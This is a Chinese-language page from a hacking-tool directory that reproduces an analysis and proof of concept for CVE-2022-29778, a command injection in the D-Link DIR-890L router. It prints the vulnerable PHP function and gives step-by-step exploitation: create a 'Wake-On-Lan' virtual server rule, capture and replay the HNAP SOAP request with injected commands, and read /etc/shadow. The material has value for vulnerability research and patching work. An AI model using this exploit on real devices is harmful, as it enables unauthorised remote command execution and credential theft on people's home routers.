Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
DIR-890L-1.20-RCE — 针对 D-Link DIR-890L RCE(CVE-2022-29778)的分析和 PoC | Kitploit
工具/GitHubGitHub/tyeyeah/dir-890l-1.20-rce
嵌入式系统安全物联网安全漏洞分析漏洞利用Web应用程序漏洞利用命令与控制
GitHubtyeyeah/dir-890l-1.20-rce

DIR-890L-1.20-RCE

针对 D-Link DIR-890L RCE(CVE-2022-29778)的分析和 PoC

查看仓库
194年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

D-Link DIR-890L RCE

受影响版本:<= v1.22B01 Hotfix(最新)

固件:此处

该型号已到达其生命周期的终点。与此类产品相关的资源已停止开发,不再受支持。 D-Link Systems, Inc. 建议淘汰这些产品,并将其替换为能接收固件更新的产品。

漏洞

在其固件中,我们可以在 SetVirtualServerSettings.php 中找到一个函数 getWOLMAC:

function getWOLMAC($ipv4addr)
{
	$cmd = "scut -p ".$ipv4addr." -f 3 /proc/net/arp";
	setattr("/runtime/wakeonlan/mac", "get", $cmd);
	$mac = get("", "/runtime/wakeonlan/mac");
	del("/runtime/wakeonlan/mac");
	return $mac;
}

$cmd 将 $ipv4addr 直接拼接到命令中,没有经过过滤,并在以下位置被调用:

		$ipv4addr = get("x", "LocalIPAddress");
        ...
		if($description == "Wake-On-Lan")
		{
			$wolmac = getWOLMAC($ipv4addr);
			set($vsvr_entry.":".$InDeX."/wakeonlan_mac", $wolmac);
		}

因此,当你将 $description(对应虚拟服务器名称)设置为 "Wake-On-Lan" 时,在虚拟服务器相关页面 /VirtualServer.html 中可能存在 RCE(远程命令执行)。

漏洞利用

  • 它需要身份验证,因此请先登录。 Login Home

  • 然后访问 虚拟服务器页面(/VirtualServer.html),该页面无法通过管理面板访问。 Virtual Server

  • 添加一个名为 Wake-On-Lan 的规则。 Add rule Rule results

  • 在点击 Save 按钮之前启动 burpsuite,并捕获以下数据包: packet

POST /HNAP1/ HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/xml
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: text/xml
SOAPACTION: "http://purenetworks.com/HNAP1/SetVirtualServerSettings"
HNAP_AUTH: A4A816AE6CF2AC5537B0EB390FFB591C 1436839665
Content-Length: 765
Origin: http://192.168.0.1
Connection: close
Referer: http://192.168.0.1/VirtualServer.html
Cookie: uid=ZeNYZag3Gw

<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
	<soap:Body>
		<SetVirtualServerSettings>
			<VirtualServerList>
				<VirtualServerInfo>
					<Enabled>true</Enabled>
					<VirtualServerDescription>Wake-On-Lan</VirtualServerDescription>
					<ExternalPort>1</ExternalPort>
					<InternalPort>1</InternalPort>
					<ProtocolType>TCP</ProtocolType>
					<ProtocolNumber>6</ProtocolNumber>
					<LocalIPAddress>192.168.0.100</LocalIPAddress>
					<ScheduleName></ScheduleName>
				</VirtualServerInfo>
			</VirtualServerList>
		</SetVirtualServerSettings>
	</soap:Body>
</soap:Envelope>
  • 准备一个 HTTP 服务器,然后:
    python server

  • 使用 Repeater 模块测试 RCE(远程命令执行): burpsuite

  • 而我们得到: result

  • 测试命令注入并读取 /etc/shadow: command ls /busy/box result command ls /busybox -al result command cat /etc/shadow result

下载工具